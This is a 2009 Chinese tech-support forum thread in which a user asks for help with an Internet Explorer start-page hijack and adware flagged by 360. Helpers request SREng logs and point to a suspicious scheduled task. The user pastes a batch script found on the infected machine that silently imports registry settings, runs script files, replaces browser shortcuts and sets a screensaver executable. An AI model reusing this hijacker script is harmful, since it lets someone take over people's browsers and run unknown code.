123   1  /  3  页   跳转

[求助] 求救```

求救```

程序名称:C:\WINDOWS\SYSTEM32\REG.EXE
修改 HKEY_CURRENT_USER\SOFTWARE\MICROSOFT\INTERNET EXPLORER\MAIN\START PAGE
  由 about:blank 修改为 http://www.net.cn.jiemei.xpdao.cn/blankblankblankblankblankblankblankblankblankblank.htm
用了瑞星没发现病毒. 360发现恶意插件ab365live清理不掉.任务管理器280+
指点哈``!!!!!

用户系统信息:Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; GTB6; Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) )

附件附件:

文件名:SREngLOG4.rar
下载次数:201
文件类型:application/octet-stream
文件大小:
上传时间:2009-7-6 23:17:06
描述:rar

最后编辑╬完美人生灬 最后编辑于 2009-07-06 23:17:06
分享到:
gototop
 

回复:求救```

急急急
gototop
 

回复 1F ╬完美人生灬 的帖子

反病毒区求助,上传sreng日志。
gototop
 

回复: 求救```

这应该是一个历史记录,楼主的主页有没有被修改?
如果总是这样提示,可以给该键值设个权限
然后上传sreng日志
最后编辑是昔流芳 最后编辑于 2009-07-06 21:04:51
gototop
 

高手显身`日字

程序名称:C:\WINDOWS\SYSTEM32\REG.EXE
修改 HKEY_CURRENT_USER\SOFTWARE\MICROSOFT\INTERNET EXPLORER\MAIN\START PAGE
  由 about:blank 修改为 http://www.net.cn.jiemei.xpdao.cn/blankblankblankblankblankblankblankblankblankblank.htm
    前几天发过了.我自己简单处理以为没问题今天又是这情况.360发现恶意软件ab365live

用户系统信息:Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; GTB6; Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) )

附件附件:

下载次数:158
文件类型:application/octet-stream
文件大小:
上传时间:2009-7-8 14:07:06
描述:rar

最后编辑╬完美人生灬 最后编辑于 2009-07-08 14:15:01
gototop
 

回复:高手显身`日字

@echo off
start zbhtzser.htm
regedit /s zbhtsert.reg
start zbhteiala.vbs
copy "Internet Explorer.lnk" "%userprofile%\桌面\Internet  Explorer.lnk" /y
copy "Internet Explorer.lnk" "%userprofile%\「开始」菜单\Internet  Explorer.lnk" /y
copy "Internet Explorer.lnk" "%userprofile%\「开始」菜单\程序\Internet  Explorer.lnk" /y
copy "Internet Explorer.lnk" "%userprofile%\Application Data\Microsoft\Internet Explorer\Quick Launch\启动 Internet  Explorer 浏览器.lnk" /y
copy "Internet Explorer.lnk" "%userprofile%\Application Data\Microsoft\Internet Explorer\Quick Launch\Internet  Explorer.lnk" /y
copy "baobao.lnk" "%userprofile%\桌面\淘宝购物.lnk" /y
del "%userprofile%\桌面\IEXPLORE.lnk"
del "%userprofile%\桌面\IEXPLOREr.lnk"
del "%userprofile%\桌面\Internet Explorer.lnk"
del "%userprofile%\Application Data\Microsoft\Internet Explorer\Quick Launch\Internet Explorer.lnk"
del "%userprofile%\Application Data\Microsoft\Internet Explorer\Quick Launch\启动 Internet Explorer 浏览器.lnk"
@reg add "HKEY_CURRENT_USER\Control Panel\desktop" /v "SCRNSAVE.EXE" /t reg_sz /d C:\WINDOWS\system32\ucze.scr /f
@reg add "HKEY_CURRENT_USER\Control Panel\desktop" /v "ScreenSaveActive" /t reg_sz /d 1 /f
@reg add "HKEY_CURRENT_USER\Control Panel\desktop" /v "ScreenSaveTimeOut" /t reg_sz /d 60 /f
exit  这是什么???
gototop
 

回复:求救```

去看看这个计划任务是什么。
==================================
计划任务
[已禁用] $~$Sys0$.job
        C:\WINDOWS\System32\rundll32.exe
百年以后,你的墓碑旁 刻着的名字不是我
gototop
 

回复: 求救```



引用:
原帖由 天月来了 于 2009-7-8 14:36:00 发表
去看看这个计划任务是什么。
==================================
计划任务
[已禁用] $~$Sys0$.job
        C:\WINDOWS\System32\rundll32.exe 

    在哪里看???
gototop
 

回复: 求救```

就这东西一点就遭!!

引用:
原帖由 ╬完美人生灬 于 2009-7-8 14:30:00 发表
@echo off
start zbhtzser.htm
regedit /s zbhtsert.reg
start zbhteiala.vbs
copy "Internet Explorer.lnk" "%userprofile%\桌面\Internet  Explorer.lnk" /y
copy "Internet Explorer
gototop
 

回复:求救```

控制面板里找你的计划任务,不是找那C:\WINDOWS\System32\rundll32.exe 文件。

那只是那计划任务要调用系统重要程序C:\WINDOWS\System32\rundll32.exe 工作而已

其工作起来的东西很可能就是启动cmd和reg的两程序的。

不知道什么叫计划任务,就百度嘛,立即可知
百年以后,你的墓碑旁 刻着的名字不是我
gototop
 
123   1  /  3  页   跳转
页面顶部
Powered by Discuz!NT